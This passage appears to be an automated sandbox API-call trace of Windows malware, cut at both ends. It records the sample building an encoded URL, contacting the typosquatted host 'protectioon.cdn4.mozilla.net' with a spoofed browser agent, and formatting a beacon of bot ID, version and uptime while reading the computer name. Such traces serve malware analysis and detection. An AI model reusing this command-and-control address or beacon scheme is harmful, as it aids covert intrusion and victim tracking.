_Dest=0x2c5f42b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0109.638] _snprintf (in: _Dest=0x2c5f44e, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0109.638] _snprintf (in: _Dest=0x2c5f4ba, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0109.638] _snprintf (in: _Dest=0x2c5f52b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0109.638] _snprintf (in: _Dest=0x2c5f53b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0109.639] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f240 | out: hHeap=0x2860000) returned 1 [0109.639] lstrlenA (lpString="isRVJBv0mXSMa2Ji_2FGT82FMxGoymkAZ3E_2BNb5YriH7PZEE1cawWrKjEwg8xdPtbXs4_2FisFBMWyUFwIw4TSL6aC4rkUqj2cSesZvz7Zk8JZpOBsbnVXktKujVY57Jwo2zFLEz0ADjp6tLESG3wbJ7TLcLYVnvGgiImSsskey7jIDd_2F3aorVdm869DfYuCXx9PEf74q9Grv2cO3R0JbpB39D78cO3Nw032fpABBDDcRw2d50UkpmbTrlDBV3w8iuVmDFfdg9FpqHt2l7yiqYCtC5Sqnim_2B8JDZcDyHJ67Ef_2Bz") returned 311 [0109.639] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15e) returned 0x2c5f240 [0109.639] memcpy (in: _Dst=0x2c5f240, _Src=0x2c5f408, _Size=0x13 | out: _Dst=0x2c5f240) returned 0x2c5f240 [0109.639] memcpy (in: _Dst=0x2c5f254, _Src=0x2c5f41b, _Size=0x16 | out: _Dst=0x2c5f254) returned 0x2c5f254 [0109.639] memcpy (in: _Dst=0x2c5f26b, _Src=0x2c5f431, _Size=0xd | out: _Dst=0x2c5f26b) returned 0x2c5f26b [0109.639] memcpy (in: _Dst=0x2c5f279, _Src=0x2c5f43e, _Size=0x8 | out: _Dst=0x2c5f279) returned 0x2c5f279 [0109.639] memcpy (in: _Dst=0x2c5f282, _Src=0x2c5f446, _Size=0x17 | out: _Dst=0x2c5f282) returned 0x2c5f282 [0109.639] memcpy (in: _Dst=0x2c5f29a, _Src=0x2c5f45d, _Size=0xa | out: _Dst=0x2c5f29a) returned 0x2c5f29a [0109.639] memcpy (in: _Dst=0x2c5f2a5, _Src=0x2c5f467, _Size=0x11 | out: _Dst=0x2c5f2a5) returned 0x2c5f2a5 [0109.639] memcpy (in: _Dst=0x2c5f2b7, _Src=0x2c5f478, _Size=0xc | out: _Dst=0x2c5f2b7) returned 0x2c5f2b7 [0109.639] memcpy (in: _Dst=0x2c5f2c4, _Src=0x2c5f484, _Size=0xb | out: _Dst=0x2c5f2c4) returned 0x2c5f2c4 [0109.639] memcpy (in: _Dst=0x2c5f2d0, _Src=0x2c5f48f, _Size=0xe | out: _Dst=0x2c5f2d0) returned 0x2c5f2d0 [0109.639] memcpy (in: _Dst=0x2c5f2df, _Src=0x2c5f49d, _Size=0x15 | out: _Dst=0x2c5f2df) returned 0x2c5f2df [0109.639] memcpy (in: _Dst=0x2c5f2f5, _Src=0x2c5f4b2, _Size=0x10 | out: _Dst=0x2c5f2f5) returned 0x2c5f2f5 [0109.639] memcpy (in: _Dst=0x2c5f306, _Src=0x2c5f4c2, _Size=0xf | out: _Dst=0x2c5f306) returned 0x2c5f306 [0109.639] memcpy (in: _Dst=0x2c5f316, _Src=0x2c5f4d1, _Size=0x12 | out: _Dst=0x2c5f316) returned 0x2c5f316 [0109.639] memcpy (in: _Dst=0x2c5f329, _Src=0x2c5f4e3, _Size=0x9 | out: _Dst=0x2c5f329) returned 0x2c5f329 [0109.639] memcpy (in: _Dst=0x2c5f333, _Src=0x2c5f4ec, _Size=0x14 | out: _Dst=0x2c5f333) returned 0x2c5f333 [0109.639] memcpy (in: _Dst=0x2c5f348, _Src=0x2c5f500, _Size=0x13 | out: _Dst=0x2c5f348) returned 0x2c5f348 [0109.639] memcpy (in: _Dst=0x2c5f35c, _Src=0x2c5f513, _Size=0x16 | out: _Dst=0x2c5f35c) returned 0x2c5f35c [0109.639] memcpy (in: _Dst=0x2c5f373, _Src=0x2c5f529, _Size=0x11 | out: _Dst=0x2c5f373) returned 0x2c5f373 [0109.639] memcpy (in: _Dst=0x2c5f385, _Src=0x2c5f53a, _Size=0x6 | out: _Dst=0x2c5f385) returned 0x2c5f385 [0109.640] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f408 | out: hHeap=0x2860000) returned 1 [0109.640] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b50 | out: hHeap=0x2860000) returned 1 [0109.640] StrTrimA (in: psz="isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz", pszTrimChars="\r\n" | out: psz="isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz") returned 0 [0109.640] lstrlenA (lpString="/fonts/") returned 7 [0109.640] lstrlenA (lpString="isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz") returned 330 [0109.640] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x152) returned 0x2c59b28 [0109.640] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0109.640] lstrcatA (in: lpString1="/fonts/", lpString2="isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz" | out: lpString1="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz") returned="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz" [0109.640] lstrcpyA (in: lpString1=0x2c5f240, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0109.640] lstrcpyA (in: lpString1=0x2c5ea38, lpString2="protectioon.cdn4.mozilla.net" | out: lpString1="protectioon.cdn4.mozilla.net") returned="protectioon.cdn4.mozilla.net" [0109.640] lstrcatA (in: lpString1="protectioon.cdn4.mozilla.net", lpString2="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz" | out: lpString1="protectioon.cdn4.mozilla.net/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz") returned="protectioon.cdn4.mozilla.net/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz" [0109.640] lstrcatA (in: lpString1="protectioon.cdn4.mozilla.net/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz", lpString2=".bak" | out: lpString1="protectioon.cdn4.mozilla.net/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak") returned="protectioon.cdn4.mozilla.net/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak" [0109.640] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0109.640] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4 [0109.640] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c8 [0109.640] lstrlenA (lpString="protectioon.cdn4.mozilla.net/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak") returned 369 [0109.640] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x172) returned 0x2c5f3a8 [0109.640] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x172) returned 0x2c5f528 [0109.640] StrChrA (lpStart="protectioon.cdn4.mozilla.net/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak", wMatch=0x2f) returned="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak" [0109.640] StrChrA (lpStart="protectioon.cdn4.mozilla.net/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak", wMatch=0x3f) returned 0x0 [0109.640] memcpy (in: _Dst=0x2c5f3a8, _Src=0x2c5ea38, _Size=0x1c | out: _Dst=0x2c5f3a8) returned 0x2c5f3a8 [0109.640] lstrcpyA (in: lpString1=0x2c5f528, lpString2="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak" | out: lpString1="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak") returned="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak" [0109.640] lstrlenA (lpString="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak") returned 341 [0109.640] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2ab) returned 0x2c5f6a8 [0109.640] InternetCanonicalizeUrlA (lpszUrl="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak", lpszBuffer=0x2c5f6a8, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0109.640] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak", lpszBuffer=0x2c5f6a8, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak", lpdwBufferLength=0x11ff040) returned 1 [0109.641] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f528 | out: hHeap=0x2860000) returned 1 [0109.641] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0109.641] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0109.642] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0109.642] ResetEvent (hEvent=0x1c4) returned 1 [0109.642] InternetConnectA (hInternet=0xcc0004, lpszServerName="protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0109.642] InternetConnectA (hInternet=0xcc0004, lpszServerName="protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0109.643] SetEvent (hEvent=0x1c4) returned 1 [0109.643] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/isRVJBv0mXSMa2Ji_2F/GT82FMxGoymkAZ3E_2BNb5/YriH7PZEE1caw/WrKjEwg8/xdPtbXs4_2FisFBMWyUFwIw/4TSL6aC4rk/Uqj2cSesZvz7Zk8JZ/pOBsbnVXktKu/jVY57Jwo2zF/LEz0ADjp6tLESG/3wbJ7TLcLYVnvGgiImSss/key7jIDd_2F3aorV/dm869DfYuCXx9PE/f74q9Grv2cO3R0JbpB/39D78cO3N/w032fpABBDDcRw2d50Uk/pmbTrlDBV3w8iuVmDFf/dg9FpqHt2l7yiqYCtC5Sqn/im_2B8JDZcDyHJ67E/f_2Bz.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0109.643] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0109.643] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0109.643] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0109.643] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0109.643] ResetEvent (hEvent=0x1c4) returned 1 [0109.643] ResetEvent (hEvent=0x1c8) returned 1 [0109.643] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0109.643] GetLastError () returned 0x3e5 [0109.643] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x102 [0109.643] HttpQueryInfoA (hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) [0109.643] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0109.644] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0109.692] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x0 [0109.692] SetEvent (hEvent=0x1c4) returned 1 [0109.692] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0119.703] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0119.703] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0119.704] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0119.704] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0119.704] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0119.704] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0119.704] CloseHandle (hObject=0x1c4) returned 1 [0119.704] CloseHandle (hObject=0x1c8) returned 1 [0119.706] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f3a8 | out: hHeap=0x2860000) returned 1 [0119.706] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f6a8 | out: hHeap=0x2860000) returned 1 [0119.708] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0119.708] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f240 | out: hHeap=0x2860000) returned 1 [0119.709] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea38 | out: hHeap=0x2860000) returned 1 [0119.709] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0119.709] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0119.712] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0119.712] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0119.712] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0129.713] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0129.713] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0129.713] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0129.713] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0129.713] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2805005045134) returned 1 [0129.714] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=28050") returned 13 [0129.714] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0129.714] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0129.714] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0129.715] 